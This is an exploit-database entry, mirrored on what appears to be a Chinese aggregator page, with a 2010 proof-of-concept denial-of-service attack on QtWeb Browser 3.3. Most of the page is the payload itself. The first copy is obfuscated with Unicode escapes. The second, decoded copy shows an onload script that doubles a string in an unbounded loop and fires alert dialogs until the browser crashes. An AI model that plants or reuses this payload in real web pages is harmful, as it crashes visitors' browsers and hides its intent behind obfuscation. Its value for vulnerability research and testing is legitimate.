QtWeb Browser 3.3 – Denial of Service

  • 作者: PoisonCode
    日期: 2010-05-18
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/12655/
  • # Title: QtWeb Browser version 3.3 Dos based in Xss
# Software:http://www.qtweb.net/downloads/QtWeb-setup.exe
# Portable Software:http://www.qtweb.net/downloads/QtWeb.exe
# Version: 3.3
# Tested on: Windows
# Author: PoisonCode
# Published: 2010-05-17
# CVE-ID:()

_____ ______ _ 
|__ \ / ____|(_) |
| |__) | (___ ______ _ _ _ __ _| |_ _ _ 
|___/ \___ \ / _ \/ __| | | | '__| | __| | | |
| | ____) |__/ (__| |_| | || | |_| |_| |
|_||_____/ \___|\___|\__,_|_||_|\__|\__, |
 __/ |
|___/

PanamaSecurity.blogspot.com

Anti Lammer Enconde
 
<script type="text/javascript">document.write('\u003C\u0062\u006F\u0064\u0079\u0020\u006F\u006E\u006C\u006F\u0061\u0064\u003D\u0022\u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003A\u0062\u006C\u006F\u0063\u006B\u0028\u0029\u003B\u0022\u003E\u003C\u002F\u0062\u006F\u0064\u0079\u003E\u000D\u0020\u000D\u003C\u0073\u0063\u0072\u0069\u0070\u0074\u003E\u000D\u0020\u000D\u0066\u0075\u006E\u0063\u0074\u0069\u006F\u006E\u0020\u0062\u006C\u006F\u0063\u006B\u0028\u0029\u0020\u007B\u000D\u0020\u000D\u0076\u0061\u0072\u0020\u0062\u0020\u003D\u0020\u0027\u005C\u0078\u0034\u0043\u005C\u0078\u0045\u0046\u005C\u0078\u0031\u0033\u005C\u0078\u0030\u0030\u0027\u003B\u000D\u0066\u006F\u0072\u0020\u0028\u0061\u0020\u003D\u0030\u003B\u0061\u003C\u0039\u0039\u0039\u0039\u0039\u0039\u0039\u0039\u0039\u0039\u0039\u003B\u0061\u002B\u002B\u0029\u0020\u007B\u000D\u0062\u002B\u003D\u0062\u002B\u0027\u005C\u0078\u0034\u0043\u005C\u0078\u0045\u0046\u005C\u0078\u0031\u0033\u005C\u0078\u0030\u0030\u0027\u003B\u000D\u0061\u006C\u0065\u0072\u0074\u0028\u0027\u003C\u0068\u0074\u006D\u006C\u003E\u003C\u006D\u0061\u0072\u0071\u0075\u0065\u0065\u003E\u003C\u0068\u0031\u003E\u0027\u002B\u0062\u002B\u0062\u0029\u003B\u000D\u000D\u007D\u000D\u0020\u000D\u007D\u000D\u0020\u000D\u003C\u002F\u0073\u0063\u0072\u0069\u0070\u0074\u003E\u000D\u000D');</script>

==================================================
Exploit-DB Notes - Decoded Version:
==================================================

<body onload="javascript:block();"></body>

<script>
function block() {
var b = '\x4C\xEF\x13\x00';
for (a =0;a<99999999999;a++) {
b+=b+'\x4C\xEF\x13\x00';
alert('<html><marquee><h1>'+b+b);
}
}
</script>